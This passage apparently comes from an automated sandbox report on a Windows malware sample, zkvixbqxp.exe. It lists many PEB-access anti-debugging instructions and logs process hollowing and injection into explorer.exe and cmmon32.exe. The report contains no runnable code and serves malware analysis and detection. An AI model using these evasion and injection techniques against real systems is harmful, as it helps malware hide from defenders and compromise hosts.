          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABEA55 mov eax, dword ptr fs:[00000030h]3_2_00ABEA55
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A84257 mov eax, dword ptr fs:[00000030h]3_2_00A84257
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC5BA5 mov eax, dword ptr fs:[00000030h]3_2_00AC5BA5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB138A mov eax, dword ptr fs:[00000030h]3_2_00AB138A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]3_2_00A2138B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]3_2_00A2138B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B mov eax, dword ptr fs:[00000030h]3_2_00A2138B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAD380 mov ecx, dword ptr fs:[00000030h]3_2_00AAD380
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]3_2_00A01B8F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]3_2_00A01B8F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2B390 mov eax, dword ptr fs:[00000030h]3_2_00A2B390
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22397 mov eax, dword ptr fs:[00000030h]3_2_00A22397
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1DBE9 mov eax, dword ptr fs:[00000030h]3_2_00A1DBE9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h]3_2_00AA23E3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov ecx, dword ptr fs:[00000030h]3_2_00AA23E3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3 mov eax, dword ptr fs:[00000030h]3_2_00AA23E3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]3_2_00A753CA
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]3_2_00A753CA
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309 mov eax, dword ptr fs:[00000030h]3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB131B mov eax, dword ptr fs:[00000030h]3_2_00AB131B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FF358 mov eax, dword ptr fs:[00000030h]3_2_009FF358
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]3_2_00A23B7A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A23B7A mov eax, dword ptr fs:[00000030h]3_2_00A23B7A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FDB40 mov eax, dword ptr fs:[00000030h]3_2_009FDB40
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8B58 mov eax, dword ptr fs:[00000030h]3_2_00AC8B58
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FDB60 mov ecx, dword ptr fs:[00000030h]3_2_009FDB60
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0849B mov eax, dword ptr fs:[00000030h]3_2_00A0849B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB14FB mov eax, dword ptr fs:[00000030h]3_2_00AB14FB
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]3_2_00A76CF0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]3_2_00A76CF0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]3_2_00A76CF0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8CD6 mov eax, dword ptr fs:[00000030h]3_2_00AC8CD6
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2BC2C mov eax, dword ptr fs:[00000030h]3_2_00A2BC2C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]3_2_00AC740D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]3_2_00AC740D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]3_2_00AC740D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]3_2_00A76C0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]3_2_00A76C0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]3_2_00A76C0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]3_2_00A76C0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1746D mov eax, dword ptr fs:[00000030h]3_2_00A1746D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A44B mov eax, dword ptr fs:[00000030h]3_2_00A2A44B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]3_2_00A8C450
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]3_2_00A8C450
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]3_2_00AC05AC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]3_2_00AC05AC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A235A1 mov eax, dword ptr fs:[00000030h]3_2_00A235A1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]3_2_00A21DB5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]3_2_00A21DB5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]3_2_00A21DB5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h]3_2_00A2FD9B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h]3_2_00A2FD9B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A0D5E0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A0D5E0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]3_2_00ABFDE2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]3_2_00ABFDE2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]3_2_00ABFDE2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]3_2_00ABFDE2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA8DF1 mov eax, dword ptr fs:[00000030h]3_2_00AA8DF1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov ecx, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A7A537 mov eax, dword ptr fs:[00000030h]3_2_00A7A537
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABE539 mov eax, dword ptr fs:[00000030h]3_2_00ABE539
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040CF43 LdrLoadDll

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: D0000
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Thread register set: target process: 3452
          Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3452
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.256717981.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.509870496.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.476512956.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.248850915.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.504678905.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
